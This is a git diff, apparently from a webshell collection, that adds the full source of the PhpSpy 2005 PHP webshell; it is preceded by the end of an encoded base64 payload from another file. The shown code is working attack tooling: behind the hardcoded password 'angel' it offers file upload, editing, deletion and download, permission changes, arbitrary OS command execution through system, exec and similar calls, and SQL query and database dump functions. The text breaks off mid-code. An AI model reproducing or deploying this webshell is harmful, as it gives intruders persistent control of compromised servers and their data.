dYMlerURHUv4Gj8cq0reCzJ88UfPF9yfymq25AEPXIAstmDwqr6uL7UugbahHRVJx+yhavn+3IeLCpi705yqOGd/gwskfJONXoY0cbP0zE35jGBlxPkcOKifSxo3iBNQW/MU2NCftJtN3BJ4sLPcYKxgQFZD9zmKbir6tqL1/HcK0aD69b3612W2pA0iIFWUf8Lqco6JpRPm+n5G25I3GWZKhYrtAfzzbpbV1kHZIUJ/rH0jWO+rJjnGSRiLvYO/b0t3q+V0PR23MOJZXMoLxaTVqYmLetcfmdCwbxiPhOuRwuRVOBgYkKJlFxjqVcLLCCc/IB5PCF+2HQhgCJvnQ0Tn+BMuW5MXsNZUf0GUocW48J1rj9FcstAiqw9nnZRE4Vj6TrS5p8tTI08cx3AZx2U5Pecpcl5bfmNU0Pg+qynr9tqZWWKWUFmk86eppPn5UiAZYm/m6fkDX0xZcnY3HhhwqyOXnhzcbOlmw+WdkjNuOJPv64DU9lX5jOn8Dh6exLCkCOYWRUuGSJvH5pLmgxb2AyuTkREpy4YsaJTU6Nutf2dWrwb3yAragRDbU1vRj/LltTZ45hNY4unIh1FSaplI/4MbZ4xE7IVQx+YxpiLNLwtxwHtvrMacsWKG68ebV2hiIHqGdO09xriitvJ9g3EkpksHeEeEdxQTAW21QtEK8SwSCz2O7UT/0z9kGiTfY5JycuUzrpbaIYnbPl4YONmWx45ub0CIgEgjhfPNgEWGApxEK86IRTODU35HklVlciintw1EeHPcjk9mVx7LeI1kjV4igWS5FrnoV9zOfzjCrJxBADqCnrSUV7MMa+2l4Ap/Zh2c1LN0ufAu3TM/RY9/8H')));
+
+?>
\ No newline at end of file
diff --git a/php/phpspy/phpspy_2005_full.php b/php/phpspy/phpspy_2005_full.php
new file mode 100644
index 0000000..5218800
--- /dev/null
+++ b/php/phpspy/phpspy_2005_full.php
@@ -0,0 +1,1211 @@
+<?php
+/*
++--------------------------------------------------------------------------+
+| str_replace("-", "", "P-h-p-S-p-y") Version:2005 Full                    |
+| Codz by Angel                                                            |
+| (c) 2004 Security Angel Team                                             |
+| http://www.4ngel.net                                                     |
+| ======================================================================== |
+| Team:  http://www.4ngel.net                                              |
+|        http://www.bugkidz.org                                            |
+| Email: 4ngel@21cn.com                                                    |
+| Date:  Dec 28st(My girl friend's birthday), 2004                         |
++--------------------------------------------------------------------------+
+*/
+
+error_reporting(7);
+ob_start();
+$mtime = explode(' ', microtime());
+$starttime = $mtime[1] + $mtime[0];
+
+/*===================== ³ÌÐòÅäÖà =====================*/
+
+// ÊÇ·ñÐèÒªÃÜÂëÑéÖ¤,1ΪÐèÒªÑéÖ¤,ÆäËûÊý×ÖΪֱ½Ó½øÈë.ÏÂÃæÑ¡ÏîÔòÎÞЧ
+$admin['check']="1";
+
+// ÑéÖ¤·½Ê½,1Ϊ²ÉÓà Session ÑéÖ¤,ÆäËûÊý×ÖÔò²ÉÓà CookieÑéÖ¤
+// ĬÈϲÉÓà Session ÑéÖ¤,Èç¹û²»ÄÜÕý³£µÇ½,½¨Òé¸ÄΪ CookieÑéÖ¤
+$admin['checkmode']="1";
+
+// Èç¹ûÐèÒªÃÜÂëÑéÖ¤,ÇëÐ޸ĵǽÃÜÂë
+$admin['pass']="angel";
+
+/*===================== ÅäÖýáÊø =====================*/
+
+
+// ÔÊÐí³ÌÐòÔÚ register_globals = off µÄ»·¾³Ï¹¤×÷
+if ( function_exists('ini_get') ) {
+	$onoff = ini_get('register_globals');
+} else {
+	$onoff = get_cfg_var('register_globals');
+}
+if ($onoff != 1) {
+	@extract($_POST, EXTR_SKIP);
+	@extract($_GET, EXTR_SKIP);
+}
+
+$self = $_SERVER['PHP_SELF'];
+
+/*===================== Éí·ÝÑéÖ¤ =====================*/
+if($admin['check']=="1") {
+	if($admin['checkmode']=="1") {
+	/*------- session ÑéÖ¤ -------*/
+		session_start();
+		if ($_GET['action'] == "logout") {
+			session_destroy();
+			echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$self."\">";
+			echo "<span style=\"font-size: 12px; font-family: Verdana\">×¢Ïú³É¹¦......<p><a href=\"".$self."\">ÈýÃëºó×Ô¶¯Í˳ö»òµ¥»÷ÕâÀïÍ˳ö³ÌÐò½çÃæ&gt;&gt;&gt;</a></span>";
+			exit;
+		}
+		if ($login) {
+			$adminpass=trim($_POST['adminpass']);
+			if ($adminpass==$admin['pass']) {
+				$_SESSION['adminpass'] = $admin['pass'];
+				echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$self."\">";
+				echo "<span style=\"font-size: 12px; font-family: Verdana\">µÇ½³É¹¦......<p><a href=\"".$self."\">ÈýÃëºó×Ô¶¯Ìøת»òµ¥»÷ÕâÀï½øÈë³ÌÐò½çÃæ&gt;&gt;&gt;</a></span>";
+				exit;
+			}
+		}
+		if (session_is_registered('adminpass')) {
+			if ($_SESSION['adminpass']!=$admin['pass']) {
+				loginpage();
+			}
+		} else {
+			loginpage();
+		}
+	} else {
+	/*------- cookie ÑéÖ¤ -------*/
+		if ($_GET['action'] == "logout") {
+			setcookie ("adminpass", "");
+			echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$self."\">";
+			echo "<span style=\"font-size: 12px; font-family: Verdana\">×¢Ïú³É¹¦......<p><a href=\"".$self."\">ÈýÃëºó×Ô¶¯Í˳ö»òµ¥»÷ÕâÀïÍ˳ö³ÌÐò½çÃæ&gt;&gt;&gt;</a></span>";
+			exit;
+		}
+		if ($login) {
+			$adminpass=trim($_POST['adminpass']);
+			if ($adminpass==$admin['pass']) {
+				setcookie ("adminpass",$admin['pass'],time()+(1*24*3600));
+				echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$self."\">";
+				echo "<span style=\"font-size: 12px; font-family: Verdana\">µÇ½³É¹¦......<p><a href=\"".$self."\">ÈýÃëºó×Ô¶¯Ìøת»òµ¥»÷ÕâÀï½øÈë³ÌÐò½çÃæ&gt;&gt;&gt;</a></span>";
+				exit;
+			}
+		}
+		if (isset($_COOKIE['adminpass'])) {
+			if ($_COOKIE['adminpass']!=$admin['pass']) {
+				loginpage();
+			}
+		} else {
+			loginpage();
+		}
+	}
+
+}//end check
+/*===================== ÑéÖ¤½áÊø =====================*/
+
+// ÅÐ¶Ï magic_quotes_gpc ״̬
+if (get_magic_quotes_gpc()) {
+    $_GET = stripslashes_array($_GET);
+	$_POST = stripslashes_array($_POST);
+}
+
+if ($_GET['action'] == "phpinfo") {
+	$dis_func = get_cfg_var("disable_functions");
+	echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() º¯ÊýÒѱ»½ûÓÃ,Çë²é¿´&lt;PHP»·¾³±äÁ¿&gt;";
+	exit;
+}
+
+// ÏÂÔØÎļþ
+if (!empty($downfile)) {
+	if (!@file_exists($downfile)) {
+		echo "<script>alert('ÄãҪϵÄÎļþ²»´æÔÚ!')</script>";
+	} else {
+		$filename = basename($downfile);
+		$filename_info = explode('.', $filename);
+		$fileext = $filename_info[count($filename_info)-1];
+		header('Content-type: application/x-'.$fileext);
+		header('Content-Disposition: attachment; filename='.$filename);
+		header('Content-Description: PHP Generated Data');
+		header('Content-Length: '.filesize($downfile));
+		@readfile($downfile);
+		exit;
+	}
+}
+
+
+
+// ³ÌÐòĿ¼
+$pathname=str_replace('\\','/',dirname(__FILE__)); 
+
+// »ñÈ¡µ±Ç°Â·¾¶
+if (!isset($dir) or empty($dir)) {
+	$dir = ".";
+	$nowpath = getPath($pathname, $dir);
+} else {
+	$dir=$_GET['dir'];
+	$nowpath = getPath($pathname, $dir);
+}
+
+// Åж϶ÁдÇé¿ö
+if (dir_writeable($nowpath)) {
+	$dir_writeable = "¿Éд";
+} else {
+	$dir_writeable = "²»¿Éд";
+}
+
+$dis_func = get_cfg_var("disable_functions");
+$phpinfo=(!eregi("phpinfo",$dis_func)) ? " | <a href=\"?action=phpinfo\" target=\"_blank\">PHPINFO()</a>" : "";
+$shellmode=(!get_cfg_var("safe_mode")) ? " | <a href=\"?action=shell\">WebShell</a>" : "";
+?>
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
+<title>PhpSpy Ver 2005</title>
+<style type="text/css">
+body,td {
+	font-family: "sans-serif";
+	font-size: "12px";
+	line-height: "150%";
+}
+.smlfont {
+	font-family: "sans-serif";
+	font-size: "11px";
+}
+.INPUT {
+	FONT-SIZE: "12px";
+	COLOR: "#000000";
+	BACKGROUND-COLOR: "#FFFFFF";
+	height: "18px";
+	border: "1px solid #666666";
+}
+.redfont {
+	COLOR: "#A60000";
+}
+a:link,
+a:visited,
+a:active{
+	color: "#000000";
+	text-decoration: underline;
+}
+a:hover{
+	color: "#465584";
+	text-decoration: none;
+}
+.firstalt	{BACKGROUND-COLOR: "#EFEFEF"}
+.secondalt	{BACKGROUND-COLOR: "#F5F5F5"}
+</style>
+<SCRIPT language=JavaScript>
+function CheckAll(form)
+{
+	for (var i=0;i<form.elements.length;i++)
+	{
+		var e = form.elements[i];
+		if (e.name != 'chkall')
+		e.checked = form.chkall.checked;
+    }
+}
+</SCRIPT>
+</head>
+
+<body style="table-layout:fixed; word-break:break-all">
+<center>
+<table width="760" border="0" cellpadding="3" cellspacing="0" bgcolor="#ffffff">
+  <tr bgcolor="#cccccc">
+    <td width="375" align="right" nowrap><b><?=$_SERVER['HTTP_HOST']?></b></td>
+    <td width="10" align="center" nowrap><b>:</b></td>
+    <td width="375" nowrap><b><?=$_SERVER['REMOTE_ADDR']?></b></td>
+  </tr>
+  <tr>
+    <td colspan="3" align="center" nowrap><a href="?action=logout">×¢Ïú»á»°</a> | <a href="?action=dir">·µ»Ø PhpSpy Ŀ¼</a> | <a href="?action=phpenv">PHP»·¾³±äÁ¿</a><?=$phpinfo?><?=$shellmode?> | <a href="?action=sql">SQL Query</a> | <a href="?action=sqlbak">MySQL Backup</a> | <a href="http://www.4ngel.net" target="_blank" title="ÏÂÔش˳ÌÐò">Version 2005</a></td>
+  </tr>
+</table>
+<hr width="760" noshade>
+<table width="760" border="0" cellpadding="0">
+ <form action="" method="GET">
+  <tr>
+    <td><p>³ÌÐò·¾¶:<?=$pathname?><br>µ±Ç°Ä¿Â¼(<?=$dir_writeable?>,<?=substr(base_convert(@fileperms($nowpath),10,8),-4);?>):<?=$nowpath?>
+        <br>ÌøתĿ¼:
+        <input name="dir" type="text" class="INPUT">
+        <input type="submit" class="INPUT" value="È·¶¨"> ¡¼Ö§³Ö¾ø¶Ô·¾¶ºÍÏà¶Ô·¾¶¡½
+    </p></td>
+  </tr>
+ </form>
+ <form action="?dir=<?=urlencode($dir)?>" method="POST" enctype="multipart/form-data">
+  <tr>
+    <td colspan="2">ÉÏ´«Îļþµ½µ±Ç°Ä¿Â¼:
+      <input name="uploadmyfile" type="file" class="INPUT">	<input type="submit" name="uploadfile" class="INPUT" value="È·¶¨">
+      <input type="hidden" name="uploaddir" value="<?=$dir?>"></td>
+  </tr>
+  </form>
+  <form action="?action=editfile&dir=<?=urlencode($dir)?>" method="POST">
+  <tr>
+    <td colspan="2">н¨ÎļþÔÚµ±Ç°Ä¿Â¼:
+        <input name="newfile" type="text" class="INPUT" value="">
+        <input type="submit" class="INPUT" name="createfile" value="È·¶¨"></td>
+  </tr>
+  </form>
+  <form action="" method="POST">
+  <tr>
+    <td colspan="2">н¨Ä¿Â¼ÔÚµ±Ç°Ä¿Â¼:
+        <input name="newdirectory" type="text" class="INPUT" value="">
+        <input type="submit" class="INPUT" name="createdirectory" value="È·¶¨"></td>
+  </tr>
+  </form>
+</table>
+<hr width="760" noshade>
+<?php
+/*===================== Ö´ÐвÙ×÷ ¿ªÊ¼ =====================*/
+echo "<p><b>\n";
+// ɾ³ýÎļþ
+if(@$delfile!="") {
+	if(file_exists($delfile)) {
+		if (@unlink($delfile)) {
+			echo "".$delfile." ɾ³ý³É¹¦!";
+		} else {
+			echo "Îļþɾ³ýʧ°Ü!";
+		}
+	} else {
+		echo "ÎļþÒѲ»´æÔÚ,ɾ³ýʧ°Ü!";
+	}
+}
+
+// ɾ³ýĿ¼
+elseif($rmdir) {
+	if($deldir!="") {
+		$deldirs="$dir/$deldir";
+		if(!file_exists("$deldirs")) {
+			echo "Ŀ¼ÒѲ»´æÔÚ!";
+		} else {
+			deltree($deldirs);
+		}
+	} else {
+		echo "ɾ³ýʧ°Ü!";
+	}
+}
+
+// ´´½¨Ä¿Â¼
+elseif($createdirectory) {
+	if(!empty($newdirectory)) {
+		$mkdirs="$dir/$newdirectory";
+		if(file_exists("$mkdirs")) {
+			echo "¸ÃĿ¼ÒÑ´æÔÚ!";
+		} else {
+			echo $msg=@mkdir("$mkdirs",0777) ? "´´½¨Ä¿Â¼³É¹¦!" : "´´½¨Ê§°Ü!";
+			@chmod("$mkdirs",0777);
+		}
+	}
+}
+
+// ÉÏ´«Îļþ
+elseif($uploadfile) {
+	echo $msg=@copy($_FILES['uploadmyfile']['tmp_name'],"".$uploaddir."/".$_FILES['uploadmyfile']['name']."") ? "ÉÏ´«³É¹¦!" : "ÉÏ´«Ê§°Ü!";
+}
+
+// ±à¼­Îļþ
+elseif($doeditfile) {
+	$filename="$editfilename";
+	@$fp=fopen("$filename","w");
+	echo $msg=@fwrite($fp,$_POST['filecontent']) ? "дÈëÎļþ³É¹¦!" : "дÈëʧ°Ü!";
+	@fclose($fp);
+}
+
+// ±à¼­ÎļþÊôÐÔ
+elseif($editfileperm) {
+	$fileperm=base_convert($_POST['fileperm'],8,10);
+	echo $msg=@chmod($dir."/".$file,$fileperm) ? "ÊôÐÔÐ޸ijɹ¦!" : "ÐÞ¸Äʧ°Ü!";
+	echo " [".$file."] Ð޸ĺóµÄÊôÐÔΪ:".substr(base_convert(@fileperms($dir."/".$file),10,8),-4)."";
+}
+
+// Á¬½ÓMYSQL
+elseif($connect) {
+	if (@mysql_connect($servername,$dbusername,$dbpassword) AND @mysql_select_db($dbname)) {
+		echo "Êý¾Ý¿âÁ¬½Ó³É¹¦!";
+		mysql_close();
+	} else {
+		echo mysql_error();
+	}
+}
+
+// Ö´ÐÐSQLÓï¾ä
+elseif($doquery) {
+	@mysql_connect($servername,$dbusername,$dbpassword) or die("Êý¾Ý¿âÁ¬½Óʧ°Ü");
+	@mysql_select_db($dbname) or die("Ñ¡ÔñÊý¾Ý¿âʧ°Ü");
+	$result = @mysql_query($_POST['sql_query']);
+	echo ($result) ? "SQLÓï¾ä³É¹¦Ö´ÐÐ" : "³ö´í: ".mysql_error();
+	mysql_close();
+}
+
+// ±¸·Ý²Ù×÷
+elseif ($dobackup) {
+	if (empty($_POST[table])) {
+		echo "ÇëÑ¡ÔñÓû±¸·ÝµÄÊý¾Ý±í";
+	} else {
+		@mysql_connect($servername,$dbusername,$dbpassword) or die("Êý¾Ý¿âÁ¬½Óʧ°Ü");
+		@mysql_select_db($dbname) or die("Ñ¡ÔñÊý¾Ý¿âʧ°Ü");	
+		$table = array_flip($_POST[table]);
+		$filehandle = @fopen($path,"w");
+		if ($filehandle) {
+			$result = mysql_query("SHOW tables");
+			echo ($result) ? NULL : "³ö´í: ".mysql_error();
+			while ($currow = mysql_fetch_array($result)) {
+				if (isset($table[$currow[0]])) {
+					sqldumptable($currow[0], $filehandle);
+					fwrite($filehandle,"\n\n\n");
+				}
+			}
+			fclose($filehandle);
+			echo "Êý¾Ý¿âÒѳɹ¦±¸·Ýµ½ <a href=\"".$path."\" target=\"_blank\">".$path."</a>";
+			mysql_close();
+		} else {
+			echo "±¸·Ýʧ°Ü,ÇëÈ·ÈÏÄ¿±êÎļþ¼ÐÊÇ·ñ¾ßÓпÉдȨÏÞ.";
+		}
+	}
+}
+
+// ´ò°üÏÂÔØ PS:ÎļþÌ«´ó¿ÉÄܷdz£Âý
+// Thx : С»¨
+elseif($downrar) {
+	if ($dl != "") {
+		$dfiles="";
+		foreach ($dl AS $filepath=>$value) {
+			$dfiles.=$filepath.",";
+		}
+		$dfiles=substr($dfiles,0,strlen($dfiles)-1);
+		$dl=explode(",",$dfiles);
+
+		$zip=new PHPZip($dl);
+		$code=$zip->out;
+		$filename=$_POST['rarfile'];
+		
+		header("Content-type: application/octet-stream");
+		header("Accept-Ranges: bytes");
+		header("Accept-Length: ".strlen($code));
+		header("Content-Disposition: attachment;filename=".$filename);
+		echo $code;
+		exit;
+	} else {
+		echo "ÇëÑ¡ÔñÒª´ò°üÏÂÔصÄÎļþ.";
+	}
+}
+
+// ²é¿´PHPÅäÖòÎÊý×´¿ö
+elseif($viewphpvar) {
+	echo "ÅäÖòÎÊý ".$_POST['phpvarname']." ¼ì²â½á¹û: ".getphpcfg($_POST['phpvarname'])."";
+}
+
+else {
+	echo "±¾³ÌÐòÓÉ <a href=\"http://www.4ngel.net\" target=\"_blank\">Security Angel</a> С×é angel [<a href=\"http://www.bugkidz.org\" target=\"_blank\">BST</a>] ¶ÀÁ¢¿ª·¢,¿ÉÔÚ <a href=\"http://www.4ngel.net\" target=\"_blank\">www.4ngel.net</a> ÏÂÔØ×îа汾.";
+}
+
+echo "</b></p>\n";
+/*===================== Ö´ÐвÙ×÷ ½áÊø =====================*/
+
+if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == "dir")) {
+?>
+<table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
+  <tr bgcolor="#cccccc">
+    <td align="center" nowrap width="30%"><b>Îļþ</b></td>
+	<td align="center" nowrap width="17%"><b>´´½¨ÈÕÆÚ</b></td>
+    <td align="center" nowrap width="17%"><b>×îºóÐÞ¸Ä</b></td>
+    <td align="center" nowrap width="12%"><b>´óС</b></td>
+    <td align="center" nowrap width="7%"><b>ÊôÐÔ</b></td>
+    <td align="center" nowrap width="17%"><b>²Ù×÷</b></td>
+  </tr>
+<?php
+// Ŀ¼Áбí
+$dirs=@opendir($dir);
+while ($file=@readdir($dirs)) {
+	$filepath="$dir/$file";
+	$a=@is_dir($filepath);
+	if($a=="1"){
+		if($file!=".." && $file!=".")	{
+			$ctime=@date("Y-m-d H:i:s",@filectime($filepath));
+			$mtime=@date("Y-m-d H:i:s",@filemtime($filepath));
+			$dirperm=substr(base_convert(fileperms($filepath),10,8),-4);
+			echo "<tr class=".getrowbg().">\n";
+			echo "  <td style=\"padding-left: 5px;\">[<a href=\"?dir=".urlencode($dir)."/".urlencode($file)."\"><font color=\"#006699\">$file</font></a>]</td>\n";
+			echo "  <td align=\"center\" nowrap valign=\"top\" class=\"smlfont\">$ctime</td>\n";
+			echo "  <td align=\"center\" nowrap valign=\"top\" class=\"smlfont\">$mtime</td>\n";
+			echo "  <td align=\"center\" nowrap valign=\"top\" class=\"smlfont\">&lt;dir&gt;</td>\n";
+			echo "  <td align=\"center\" nowrap valign=\"top\" class=\"smlfont\"><a href=\"?action=fileperm&dir=".urlencode($dir)."&file=".urlencode($file)."\">$dirperm</a></td>\n";
+			echo "  <td align=\"center\" nowrap valign=\"top\"><a href=\"?action=deldir&dir=".urlencode($dir)."&deldir=".urlencode($file)."\">ɾ³ý</a></td>\n";
+			echo "</tr>\n";
+			$dir_i++;
+		} else {
+			if($file=="..") {
+				echo "<tr class=".getrowbg().">\n";
+				echo "  <td nowrap colspan=\"6\" style=\"padding-left: 5px;\"><a href=\"?dir=".urlencode($dir)."/".urlencode($file)."\">·µ»ØÉϼ¶Ä¿Â¼</a></td>\n";
+				echo "</tr>\n";
+			}
+		}
+	}
+}//while
+@closedir($dirs); 
+?>
+<tr bgcolor="#cccccc">
+  <td colspan="6" height="5"></td>
+</tr>
+<FORM action="" method="POST">
+<?
+// ÎļþÁбí
+$dirs=@opendir($dir);
+while ($file=@readdir($dirs)) {
+	$filepath="$dir/$file";
+	$a=@is_dir($filepath);
+	if($a=="0"){
+		$size=@filesize($filepath);
+		$size=$size/1024 ;
+		$size= @number_format($size, 3);
+		if (@filectime($filepath) == @filemtime($filepath)) {
+			$ctime=@date("Y-m-d H:i:s",@filectime($filepath));
+			$mtime=@date("Y-m-d H:i:s",@filemtime($filepath));
+		} else {
+			$ctime="<span class=\"redfont\">".@date("Y-m-d H:i:s",@filectime($filepath))."</span>";
+			$mtime="<span class=\"redfont\">".@date("Y-m-d H:i:s",@filemtime($filepath))."</span>";
+		}
+		@$fileperm=substr(base_convert(@fileperms($filepath),10,8),-4);
+		echo "<tr class=".getrowbg().">\n";
+		echo "  <td style=\"padding-left: 5px;\"><INPUT type=checkbox value=1 name=dl[$filepath]><a href=\"$filepath\" target=\"_blank\">$file</a></td>\n";
+		echo "  <td align=\"center\" nowrap valign=\"top\" class=\"smlfont\">$ctime</td>\n";
+		echo "  <td align=\"center\" nowrap valign=\"top\" class=\"smlfont\">$mtime</td>\n";
+		echo "  <td align=\"right\" nowrap valign=\"top\" class=\"smlfont\"><span class=\"redfont\">$size</span> KB</td>\n";
+		echo "  <td align=\"center\" nowrap valign=\"top\" class=\"smlfont\"><a href=\"?action=fileperm&dir=".urlencode($dir)."&file=".urlencode($file)."\">$fileperm</a></td>\n";
+		echo "  <td align=\"center\" nowrap valign=\"top\"><a href=\"?downfile=".urlencode($filepath)."\">ÏÂÔØ</a> | <a href=\"?action=editfile&dir=".urlencode($dir)."&editfile=".urlencode($file)."\">±à¼­</a> | <a href=\"?dir=".urlencode($dir)."&delfile=".urlencode($filepath)."\">ɾ³ý</a></td>\n";
+		echo "</tr>\n";
+		$file_i++;
+	}
+}
+@closedir($dirs); 
+?>
+<tr class="<?=getrowbg()?>">
+  <td nowrap colspan="6"><table width="100%" border="0" cellpadding="2" cellspacing="0" align="center">
+    <tr>
+      <td><INPUT onclick="CheckAll(this.form)" type="checkbox" value="on" name="chkall"> <input name="rarfile" type="text" class="INPUT" value="<?=$_SERVER['HTTP_HOST']?>_Files.rar"> <input type="submit" name="downrar" value="Ñ¡ÖÐÎļþ´ò°üÏÂÔØ" class="INPUT"></td>
+      <td align="right"><?=$dir_i?> ¸öĿ¼ / <?=$file_i?> ¸öÎļþ</td>
+    </tr>
+  </table></td>
+</tr>
+</FORM>
+</table>
+
+<?php
+}// end dir
+
+elseif ($_GET['action'] == "editfile") {
+	if($newfile=="") {
+		$filename="$dir/$editfile";
+		$fp=@fopen($filename,"r");
+		$contents=@fread($fp, filesize($filename));
+		@fclose($fp);
+		$contents=htmlspecialchars($contents);
+	}else{
+		$editfile=$newfile;
+		$filename = "$dir/$editfile";
+	}
+?>
+<table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
+  <tr class="firstalt">
+    <td align="center">н¨/±à¼­Îļþ [<a href="?dir=<?=urlencode($dir)?>">·µ»Ø</a>]</td>
+  </tr>
+  <form action="?dir=<?=urlencode($dir)?>" method="POST">
+  <tr class="secondalt">
+    <td align="center">µ±Ç°Îļþ:<input class="input" type="text" name="editfilename" size="30"
+value="<?=$filename?>"> ÊäÈëÐÂÎļþÃûÔò½¨Á¢ÐÂÎļþ</td>
+  </tr>  
+  <tr class="firstalt">
+    <td align="center"><textarea name="filecontent" cols="100" rows="20"><?=$contents?></textarea></td>
+  </tr>  
+  <tr class="secondalt">
+    <td align="center"><input type="submit" name="doeditfile" value="È·¶¨Ð´Èë" class="input">
+      <input type="reset" value="ÖØÖÃ" class="input"></td>
+  </tr>
+  </form>
+</table>
+<?php
+}//end editfile
+
+elseif ($_GET['action'] == "shell") {
+	if (!get_cfg_var("safe_mode")) {
+?>
+<table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
+  <tr class="firstalt">
+    <td align="center">WebShell Mode</td>
+  </tr>
+  <form action="?action=shell&dir=<?=urlencode($dir)?>" method="POST">
+  <tr class="secondalt">
+    <td align="center">Ìáʾ:Èç¹ûÊä³ö½á¹û²»ÍêÈ«,½¨Òé°ÑÊä³ö½á¹ûдÈëÎļþ.ÕâÑù¿ÉÒԵõ½È«²¿ÄÚÈÝ.</td>
+  </tr>
+  <tr class="firstalt">
+    <td align="center">
+	  Ñ¡ÔñÖ´Ðк¯Êý:
+	  <select name="execfunc" class="input">
+		<option value="system" <? if ($execfunc=="system") { echo "selected"; } ?>>system</option>
+		<option value="passthru" <? if ($execfunc=="passthru") { echo "selected"; } ?>>passthru</option>
+		<option value="exec" <? if ($execfunc=="exec") { echo "selected"; } ?>>exec</option>
+		<option value="shell_exec" <? if ($execfunc=="shell_exec") { echo "selected"; } ?>>shell_exec</option>
+		<option value="popen" <? if ($execfunc=="popen") { echo "selected"; } ?>>popen</option>
+	  </select>¡¡
+	  ÊäÈëÃüÁî:
+      <input type="text" name="command" size="60" value="<?=$_POST['command']?>" class="input">
+      <input type="submit" value="execute" class="input"></td>
+  </tr>  
+  <tr class="secondalt">
+    <td align="center"><textarea name="textarea" cols="100" rows="25" readonly><?php
+	if (!empty($_POST['command'])) {
+		if ($execfunc=="system") {
+			system($_POST['command']);
+		} elseif ($execfunc=="passthru") {
+			passthru($_POST['command']);
+		} elseif ($execfunc=="exec") {
+			$result = exec($_POST['command']);
+			echo $result;
+		} elseif ($execfunc=="shell_exec") {
+			$result=shell_exec($_POST['command']);
+			echo $result;	
+		} elseif ($execfunc=="popen") {
+			$pp = popen($_POST['command'], 'r');
+			$read = fread($pp, 2096);
+			echo $read;
+			pclose($pp);
+		} else {
+			system($_POST['command']);
+		}
+	}
+	?></textarea></td>
+  </tr>  
+  </form>
+</table>
+<?php
+	} else {
+?>
+<p><b>Safe_Mode ÒÑ´ò¿ª, ÎÞ·¨Ö´ÐÐϵͳÃüÁî.</b></p>
+<?php
+	}
+}//end shell
+
+elseif ($_GET['action'] == "deldir") {
+?>
+<table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
+  <form action="?dir=<?=urlencode($dir)?>" method="POST">
+  <tr class="firstalt">
+    <td align="center">ɾ³ý <input name="deldir" type="text" value="<?=$deldir?>" class="input" readonly> Ŀ¼</td>
+  </tr>  
+  <tr class="secondalt">
+    <td align="center">×¢Òâ:Èç¹û¸ÃĿ¼·Ç¿Õ,´Ë´Î²Ù×÷½«»áɾ³ý¸ÃĿ¼ÏµÄËùÓÐÎļþ.ÄúÈ·¶¨Âð?</td>
+  </tr>  
+  <tr class="firstalt">
+    <td align="center">
+	  <input type="submit" name="rmdir" value="delete" class="input">
+	</td>
+  </tr>  
+  </form>
+</table>
+<?php
+}//end deldir
+
+elseif ($_GET['action'] == "fileperm") {
+?>
+<table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
+  <tr class="firstalt">
+    <td align="center">ÐÞ¸ÄÎļþÊôÐÔ [<a href="?dir=<?=urlencode($dir)?>">·µ»Ø</a>]</td>
+  </tr>
+  <form action="?dir=<?=urlencode($dir)?>" method="POST">
+  <tr class="secondalt">
+    <td align="center"><input name="file" type="text" value="<?=$file?>" class="input" readonly> µÄÊôÐÔΪ:
+      <input type="text" name="fileperm" size="20" value="<?=substr(base_convert(fileperms($dir."/".$file),10,8),-4)?>" class="input">
+	  <input name="dir" type="hidden" value="<?=urlencode($dir)?>">
+	  <input type="submit" name="editfileperm" value="modify" class="input"></td>
+  </tr>  
+  </form>
+</table>
+<?php
+}//end fileperm
+
+elseif ($_GET['action'] == "sql") {
+	$servername = isset($servername) ? $servername : 'localhost';
+	$dbusername = isset($dbusername) ? $dbusername : 'root';
+	$dbpassword = isset($dbpassword) ? $dbpassword : '';
+	$dbname = isset($dbname) ? $dbname : '';
+?>
+<table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
+  <tr class="firstalt">
+    <td align="center">Ö´ÐÐ SQL Óï¾ä</td>
+  </tr>
+  <form action="?action=sql" method="POST">
+  <tr class="secondalt">
+    <td align="center">Host:
+    <input name="servername" type="text" class="INPUT" value="<?=$servername?>"> 
+    User:
+    <input name="dbusername" type="text" class="INPUT" size="15" value="<?=$dbusername?>">
+    Pass:
+    <input name="dbpassword" type="text" class="INPUT" size="15" value="<?=$dbpassword?>">
+    DB:
+    <input name="dbname" type="text" class="INPUT" size="15" value="<?=$dbname?>">
+    <input name="connect" type="submit" class="INPUT" value="Á¬½Ó"></td>
+  </tr>
+  <tr class="firstalt">
+    <td align="center"><textarea name="sql_query" cols="85" rows="10"></textarea></td>
+  </tr>
+  <tr class="secondalt">
+    <td align="center"><input type="submit" name="doquery" value="Ö´ÐÐ" class="input"></td>
+  </tr>  
+  </form>
+</table>
+<?php
+}//end sql query
+
+elseif ($_GET['action'] == "sqlbak") {
+	$servername = isset($servername) ? $servername : 'localhost';
+	$dbusername = isset($dbusername) ? $dbusername : 'root';
+	$dbpassword = isset($dbpassword) ? $dbpassword : '';
+	$dbname = isset($dbname) ? $dbname : '';
+?>
+<table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
+  <tr class="firstalt">
+    <td align="center">±¸·Ý MySQL Êý¾Ý¿â</td>
+  </tr>
+  <form action="?action=sqlbak" method="POST">
+  <tr class="secondalt">
+    <td align="center">Host:
+    <input name="servername" type="text" class="INPUT" value="<?=$servername?>"> 
+    User:
+    <input name="dbusername" type="text" class="INPUT" size="15" value="<?=$dbusername?>">
+    Pass:
+    <input name="dbpassword" type="text" class="INPUT" size="15" value="<?=$dbpassword?>">
+    DB:
+    <input name="dbname" type="text" class="INPUT" size="15" value="<?=$dbname?>">
+    <input name="connect" type="submit" class="INPUT" value="Á¬½Ó"></td>
+  </tr>
+  <?php
+	@mysql_connect($servername,$dbusername,$dbpassword) AND @mysql_select_db($dbname);
+    $tables = @mysql_list_tables($dbname);
+    while ($table = @mysql_fetch_row($tables)) {
+		$cachetables[$table[0]] = $table[0];
+    }
+    @mysql_free_result($tables);
+
+	if (empty($cachetables)) {
+		echo "<tr>\n";
